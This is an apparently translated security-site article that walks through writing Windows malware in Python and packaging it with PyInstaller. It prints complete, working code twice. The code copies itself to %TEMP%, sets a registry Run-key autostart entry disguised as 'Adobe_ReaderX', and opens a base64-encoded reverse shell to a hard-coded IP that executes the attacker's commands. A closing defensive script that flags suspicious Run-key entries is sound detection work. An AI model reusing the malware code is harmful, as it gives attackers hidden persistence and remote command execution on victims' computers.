Technology share: how to use Python and PyInstaller to write Windows malicious code

2016-03-09T00:00:00
ID MYHACK58:62201672391
Type myhack58
Reporter 佚名
Modified 2016-03-09T00:00:00

Description

Disclaimer: This article is intended for sharing, not for malicious use! It shows, through a few proofs of concept, how Python and PyInstaller can be used to build malicious software.

As everyone knows, malware usually wants to keep a foothold on the host it attacks. On Windows there are many ways to achieve this; the most common is to modify the following registry key: "Software\Microsoft\Windows\CurrentVersion\Run". The following Python code copies the program to the %TEMP% directory and then modifies the registry so that the code is executed whenever the user logs on to the computer.

```python
# Python 2 code: _winreg is the Python 2 name of the registry module.
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
    # Copy the executable to %TEMP%:
    os.system('copy %s %s' % (fileName, tempdir))
    # Query the Windows registry for the existing autorun values
    # and append each value name to the runkey list
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass
    # Set the autorun value (the registry entry assumes the
    # PyInstaller build was named mw.exe):
    if 'Adobe_ReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass
```

Once the code has been placed in the %TEMP% directory and set to persist, we can move on to the next part of the code, the reverse shell. Here I use the Python reverse shell released by TrustedSec, with one modification: the network traffic is Base64 encoded.

```python
def shell():
    # Base64-encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit":
            break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = r"Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()
```

Now when this program is executed, it opens a reverse shell back to the "attacker". In this case the "attacker" is just an IP address hard-coded in the script, but pointing it at a domain or an Amazon cloud host is simple and easy. The following figure shows the program executing on a Windows host and connecting to the attacker; note that the network traffic is base64 encoded:

[Figure: the program running on the Windows host and the resulting base64-encoded reverse-shell traffic]

The following is the complete code:

```python
# Python 2 code (_winreg); built into mw.exe with PyInstaller.
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
    # Copy executable to %TEMP%:
    os.system('copy %s %s' % (fileName, tempdir))
    # Query the Windows registry for the autorun key values
    # and store the value names in the runkey list
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass
    # If the autorun value "Adobe_ReaderX" isn't set, this sets it:
    if 'Adobe_ReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass

def shell():
    # Base64-encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit":
            break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = r"Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()
```
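As an added defensive counterpart (not code from the article), the following Python 3 script audits the same Run key the sample writes to and flags autostart entries that launch from %TEMP% or another user-writable scratch directory, which is exactly what the "Adobe_ReaderX" value above does. The registry is read only when winreg is available; the triage function itself is pure Python and is shown here on a constructed set of entries.

```python
"""Flag Run-key autostart entries that launch from scratch directories."""

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
# Directories a legitimate installer rarely uses for a persistent program
# (all comparisons are done in lower case).
SUSPICIOUS_DIRS = ("%temp%", "\\temp\\", "\\appdata\\local\\temp",
                   "%appdata%", "\\users\\public")


def triage_run_entries(entries):
    """entries: list of (value_name, command) pairs as stored under Run.
    Returns the subset whose command points into a scratch directory."""
    flagged = []
    for name, command in entries:
        target = command.lower().strip('"')
        if any(d in target for d in SUSPICIOUS_DIRS):
            flagged.append((name, command))
    return flagged


def read_run_entries(hive_name="HKLM"):
    """Enumerate one hive's Run key. Returns [] off Windows or if absent."""
    try:
        import winreg
    except ImportError:
        return []
    hive = (winreg.HKEY_LOCAL_MACHINE if hive_name == "HKLM"
            else winreg.HKEY_CURRENT_USER)
    entries = []
    try:
        with winreg.OpenKey(hive, RUN_KEY) as key:
            i = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, i)
                except OSError:       # no more values
                    break
                entries.append((name, str(value)))
                i += 1
    except OSError:                   # key missing or not readable
        return []
    return entries


# Constructed sample: what a host persisted by the script above might show.
SAMPLE_ENTRIES = [
    ("SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
    ("Adobe_ReaderX", r"%TEMP%\mw.exe"),
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

if __name__ == "__main__":
    live = read_run_entries("HKLM") + read_run_entries("HKCU")
    for name, cmd in triage_run_entries(live or SAMPLE_ENTRIES):
        print(f"suspicious autorun: {name} -> {cmd}")
```

Run on a Windows host it reports the live HKLM and HKCU Run values; elsewhere it falls back to the constructed sample and flags only the %TEMP% entry.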